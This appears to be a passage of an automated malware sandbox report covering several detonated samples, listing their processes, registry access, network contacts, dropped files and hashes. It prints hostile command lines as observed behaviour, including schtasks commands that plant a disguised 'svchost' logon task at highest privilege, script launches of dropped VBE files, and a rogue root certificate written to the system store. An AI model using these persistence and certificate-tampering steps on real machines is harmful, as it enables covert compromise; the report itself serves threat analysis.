Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\0di3x.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\0di3x.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0di3x.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0di3x.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0di3x.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\0di3x.exe

"C:\Users\Admin\AppData\Local\Temp\0di3x.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3812 -ip 3812

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3812 -s 376

Network

Country Destination Domain Proto
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 107.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp

Files

memory/3812-2-0x0000000000400000-0x000000000040A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2F6.tmp

MD5 4f3387277ccbd6d1f21ac5c07fe4ca68
SHA1 e16506f662dc92023bf82def1d621497c8ab5890
SHA256 767a3fc4a7a6818cdc3f0b99aaa95db694f6bcde719d2057a88b3d4df3d74fac
SHA512 9da199ac69e3c0d4e0c6307e0ab8178f12cc25cb2f14c3511f6b64e6e60a925c860f3263cb38353a97b55a71ef4d27f8cb7fa3cfc08e7c1a349fd8d209dfa219

memory/3812-1-0x00000000030B0000-0x00000000031B0000-memory.dmp

memory/3812-7-0x0000000000400000-0x0000000002FA6000-memory.dmp

memory/3812-10-0x0000000000400000-0x000000000040A000-memory.dmp

memory/3812-9-0x0000000000400000-0x0000000002FA6000-memory.dmp

Analysis: behavioral32

Detonation Overview

Submitted

2024-12-02 00:53

Reported

2024-12-02 00:58

Platform

win10v2004-20241007-en

Max time kernel

90s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ForceOp 2.8.7 - By RaiSence.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\ForceOp 2.8.7 - By RaiSence.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\intofont\wincommon.exe N/A
N/A N/A C:\PerfLogs\svchost.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\ForceOp 2.8.7 - By RaiSence.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\ForceOp 2.8.7 - By RaiSence.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\intofont\wincommon.exe N/A
N/A N/A C:\PerfLogs\svchost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\intofont\wincommon.exe N/A
Token: SeDebugPrivilege N/A C:\PerfLogs\svchost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2432 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\ForceOp 2.8.7 - By RaiSence.exe C:\Windows\SysWOW64\WScript.exe
PID 2432 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\ForceOp 2.8.7 - By RaiSence.exe C:\Windows\SysWOW64\WScript.exe
PID 2432 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\ForceOp 2.8.7 - By RaiSence.exe C:\Windows\SysWOW64\WScript.exe
PID 2432 wrote to memory of 4904 N/A C:\Users\Admin\AppData\Local\Temp\ForceOp 2.8.7 - By RaiSence.exe C:\Windows\SysWOW64\WScript.exe
PID 2432 wrote to memory of 4904 N/A C:\Users\Admin\AppData\Local\Temp\ForceOp 2.8.7 - By RaiSence.exe C:\Windows\SysWOW64\WScript.exe
PID 2432 wrote to memory of 4904 N/A C:\Users\Admin\AppData\Local\Temp\ForceOp 2.8.7 - By RaiSence.exe C:\Windows\SysWOW64\WScript.exe
PID 1516 wrote to memory of 872 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 1516 wrote to memory of 872 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 1516 wrote to memory of 872 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 872 wrote to memory of 1940 N/A C:\Windows\SysWOW64\cmd.exe C:\intofont\wincommon.exe
PID 872 wrote to memory of 1940 N/A C:\Windows\SysWOW64\cmd.exe C:\intofont\wincommon.exe
PID 1940 wrote to memory of 1028 N/A C:\intofont\wincommon.exe C:\Windows\SYSTEM32\schtasks.exe
PID 1940 wrote to memory of 1028 N/A C:\intofont\wincommon.exe C:\Windows\SYSTEM32\schtasks.exe
PID 1940 wrote to memory of 5068 N/A C:\intofont\wincommon.exe C:\Windows\SYSTEM32\schtasks.exe
PID 1940 wrote to memory of 5068 N/A C:\intofont\wincommon.exe C:\Windows\SYSTEM32\schtasks.exe
PID 1940 wrote to memory of 232 N/A C:\intofont\wincommon.exe C:\Windows\SYSTEM32\schtasks.exe
PID 1940 wrote to memory of 232 N/A C:\intofont\wincommon.exe C:\Windows\SYSTEM32\schtasks.exe
PID 1940 wrote to memory of 4416 N/A C:\intofont\wincommon.exe C:\PerfLogs\svchost.exe
PID 1940 wrote to memory of 4416 N/A C:\intofont\wincommon.exe C:\PerfLogs\svchost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\ForceOp 2.8.7 - By RaiSence.exe

"C:\Users\Admin\AppData\Local\Temp\ForceOp 2.8.7 - By RaiSence.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\intofont\1Udi0TDz635jTrMWFNrE4kqnOIuYIi.vbe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\intofont\msg.vbs"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\intofont\xLg6v1j1ZJy5DZ1pz826KfZq2BmfLM.bat" "

C:\intofont\wincommon.exe

"C:\intofont\wincommon.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svchost" /sc ONLOGON /tr "'C:\Users\Admin\My Documents\svchost.exe'" /rl HIGHEST /f

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svchost" /sc ONLOGON /tr "'C:\PerfLogs\svchost.exe'" /rl HIGHEST /f

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svchost" /sc ONLOGON /tr "'C:\PerfLogs\svchost.exe'" /rl HIGHEST /f

C:\PerfLogs\svchost.exe

"C:\PerfLogs\svchost.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 cb76972.tmweb.ru udp
RU 5.23.51.23:80 cb76972.tmweb.ru tcp
US 8.8.8.8:53 vh346.timeweb.ru udp
RU 5.23.51.23:443 vh346.timeweb.ru tcp
US 8.8.8.8:53 23.51.23.5.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 92.12.20.2.in-addr.arpa udp

Files

C:\intofont\1Udi0TDz635jTrMWFNrE4kqnOIuYIi.vbe

MD5 35f693ab095c33d4c62230d69ff6b43f
SHA1 19e8b126076b5e5d8e8b97f3757ad99357915bf4
SHA256 1a3b550ae14c360fd9600e52924706a356290939317f3a32b35bfa97b5dbc163
SHA512 1e2599c7b10a1fc5c004d7d68c487028d5d2d6a1102af0150ea0c15663819dac42e3a55a769cc532cf45f9f037cece3fcdc2820f2bfbe8439fd0a3d5a16bb4df

C:\intofont\msg.vbs

MD5 01c71ea2d98437129936261c48403132
SHA1 dc689fb68a3e7e09a334e7a37c0d10d0641af1a6
SHA256 0401f2dd76d5ed6f90c82b72e1e7a122ef127bedbaf717532c4bba26d43a0061
SHA512 a668d4216a50ccc699221dd902d8b0f864e44368dc7474fa5659a739154d4e769b85d49b60a73affb8fba7628e7210b0f8106d5652006d1bbba67083513e65d9

C:\intofont\MOS

MD5 cb456215c3333db0551bd0788bc258c7
SHA1 a0b861f6121344b631992c8252fa8748835e4df6
SHA256 7e7b3a01539b5dd82108fe0dc455a76294708bb782f8f7590b06f0975fdf93c1
SHA512 796ccc0f1fc4a990fe3c50f54a2d009e6ddb8e4e062ac1839a2c2c1e6f120311dad66fa86211137cb38cce27a99614085702d5fe9b6f3effc5dd1db0ad879448

C:\intofont\xLg6v1j1ZJy5DZ1pz826KfZq2BmfLM.bat

MD5 9fe442702fb57ffec2b831c3949a74e0
SHA1 e285d89241ef0aeeeb50f65e09a741baf399cb1f
SHA256 d50176a5de27bc9b4c52ebb4e30ec4cbf1e6a79eda4d83a013b220f489a5bcb9
SHA512 548a8df7f0d9278f84eca35bf40638a4572cb625050f7a0684ee14b2117df8307101d8f9383c3fcab23fcf656c21f69db3f4509a037307ed6658ff4c063b4eab

C:\intofont\wincommon.exe

MD5 9134637118b2a4485fb46d439133749b
SHA1 25b60dba36e432f53f68603797d50b9c6cc127ce
SHA256 5dca1a463f5308018c477503a5179f45c468245dd4a84732ee824bd704521acc
SHA512 a6db12e3349c034051940b15adbb530ba34152ccbe41afc210dad7e64331221b3dbae1563a2f3b79a43d12da54eaeac3f30cfb708ebc75ab6a9dfc30a8f1e601

memory/1940-20-0x0000000000C70000-0x0000000000D9C000-memory.dmp

memory/1940-21-0x0000000002F90000-0x0000000002FB2000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-12-02 00:53

Reported

2024-12-02 00:58

Platform

win7-20240903-en

Max time kernel

117s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0a9f79abd48b95544d7e2b6658637d1eb23067a94e10bf06d05c9ecc73cf4b51.exe"

Signatures

Processes

C:\Users\Admin\AppData\Local\Temp\0a9f79abd48b95544d7e2b6658637d1eb23067a94e10bf06d05c9ecc73cf4b51.exe

"C:\Users\Admin\AppData\Local\Temp\0a9f79abd48b95544d7e2b6658637d1eb23067a94e10bf06d05c9ecc73cf4b51.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 1212

Network

Country Destination Domain Proto
RU 217.8.117.77:80 tcp

Files

memory/2260-0-0x0000000074E1E000-0x0000000074E1F000-memory.dmp

memory/2260-1-0x0000000001350000-0x00000000013B0000-memory.dmp

memory/2260-2-0x0000000074E10000-0x00000000754FE000-memory.dmp

memory/2260-3-0x00000000004A0000-0x00000000004BC000-memory.dmp

memory/2260-4-0x0000000074E1E000-0x0000000074E1F000-memory.dmp

memory/2260-5-0x0000000074E10000-0x00000000754FE000-memory.dmp

memory/2260-6-0x00000000012F0000-0x000000000133C000-memory.dmp

memory/2260-7-0x0000000074E10000-0x00000000754FE000-memory.dmp

Analysis: behavioral27

Detonation Overview

Submitted

2024-12-02 00:53

Reported

2024-12-02 00:59

Platform

win7-20241010-en

Max time kernel

150s

Max time network

127s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Archive.zip__ccacaxs2tbz2t6ob3e.exe"

Signatures

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\F9CC.tmp.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Archive.zip__ccacaxs2tbz2t6ob3e.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Archive.zip__ccacaxs2tbz2t6ob3e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\F9CC.tmp.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6 C:\Users\Admin\AppData\Local\Temp\Archive.zip__ccacaxs2tbz2t6ob3e.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 0f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd C:\Users\Admin\AppData\Local\Temp\Archive.zip__ccacaxs2tbz2t6ob3e.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 19000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca61d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f006700690065007300000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a92000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd C:\Users\Admin\AppData\Local\Temp\Archive.zip__ccacaxs2tbz2t6ob3e.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd C:\Users\Admin\AppData\Local\Temp\Archive.zip__ccacaxs2tbz2t6ob3e.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Archive.zip__ccacaxs2tbz2t6ob3e.exe

"C:\Users\Admin\AppData\Local\Temp\Archive.zip__ccacaxs2tbz2t6ob3e.exe"

C:\Users\Admin\AppData\Local\Temp\F9CC.tmp.exe

C:\Users\Admin\AppData\Local\Temp\F9CC.tmp.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 domainht6.ml udp
US 8.8.8.8:53 iplogger.org udp
US 172.67.74.161:80 iplogger.org tcp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 google-analytics.com udp
GB 142.250.200.36:80 google-analytics.com tcp
US 8.8.8.8:53 osdsoft.com udp
US 70.32.1.32:80 osdsoft.com tcp
US 8.8.8.8:53 ww38.osdsoft.com udp
US 76.223.26.96:80 ww38.osdsoft.com tcp
US 8.8.8.8:53 linkury.s3-us-west-2.amazonaws.com udp
US 52.218.176.41:443 linkury.s3-us-west-2.amazonaws.com tcp
US 8.8.8.8:53 ocsp.r2m01.amazontrust.com udp
NL 18.238.246.206:80 ocsp.r2m01.amazontrust.com tcp
GB 142.250.200.36:80 google-analytics.com tcp
US 8.8.8.8:53 install.portmdfmoon.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 23.192.22.93:80 www.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\CabFD46.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarFE04.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 656d44085abc6b7d00e5f41ccc5db490
SHA1 68e0a7fc970c7ee5108f347b57f6542a21b19f47
SHA256 504b4a8e1c68c670f93a38d5738d208f92ee9e50cc42e69718acc3fbc39941b8
SHA512 0b988a8b79ad6efc6204428f5d770ae2383e421b46b4bd8058dca3fce1ea7f311930158483f42bc060f9914914bdead5a07eafadb7c9900699b5bfaacc9b94c6

C:\Users\Admin\AppData\Local\Temp\F9CC.tmp.exe

MD5 060404f288040959694844afbd102966
SHA1 e0525e9ef6713fd7f269a669335ce3ddaab4b6a1
SHA256 40517e822f3442a2f389a50e905f40a6a2c4930077c865e3ea7b1929405f760a
SHA512 ddf8c53e1e1888084fa5422f297cc3ba9d97f7576c36f6b633ce67ca789127f7e259e9fb374fcbced66f883dadde0717d81ecce9776770bf07d8cf3b94b1a43f

Analysis: behavioral28

Detonation Overview

Submitted

2024-12-02 00:53

Reported

2024-12-02 00:58

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Archive.zip__ccacaxs2tbz2t6ob3e.exe"

Signatures

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\B7B7.tmp.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Archive.zip__ccacaxs2tbz2t6ob3e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\B7B7.tmp.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Archive.zip__ccacaxs2tbz2t6ob3e.exe

"C:\Users\Admin\AppData\Local\Temp\Archive.zip__ccacaxs2tbz2t6ob3e.exe"

C:\Users\Admin\AppData\Local\Temp\B7B7.tmp.exe

C:\Users\Admin\AppData\Local\Temp\B7B7.tmp.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 domainht6.ml udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:80 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 46.2.26.104.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 google-analytics.com udp
GB 142.250.200.36:80 google-analytics.com tcp
US 8.8.8.8:53 osdsoft.com udp
US 170.178.183.18:80 osdsoft.com tcp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 36.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 ww25.osdsoft.com udp
US 199.59.243.227:80 ww25.osdsoft.com tcp
US 8.8.8.8:53 linkury.s3-us-west-2.amazonaws.com udp
US 52.92.229.186:443 linkury.s3-us-west-2.amazonaws.com tcp
US 8.8.8.8:53 18.183.178.170.in-addr.arpa udp
US 8.8.8.8:53 227.243.59.199.in-addr.arpa udp
US 8.8.8.8:53 ocsp.r2m01.amazontrust.com udp
NL 18.238.246.206:80 ocsp.r2m01.amazontrust.com tcp
US 8.8.8.8:53 186.229.92.52.in-addr.arpa udp
US 8.8.8.8:53 14.15.239.18.in-addr.arpa udp
US 8.8.8.8:53 206.246.238.18.in-addr.arpa udp
US 8.8.8.8:53 231.32.65.18.in-addr.arpa udp
GB 142.250.200.36:80 google-analytics.com tcp
US 8.8.8.8:53 install.portmdfmoon.com udp
US 8.8.8.8:53 install.portmdfmoon.com udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 107.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\B7B7.tmp.exe

MD5 060404f288040959694844afbd102966
SHA1 e0525e9ef6713fd7f269a669335ce3ddaab4b6a1
SHA256 40517e822f3442a2f389a50e905f40a6a2c4930077c865e3ea7b1929405f760a
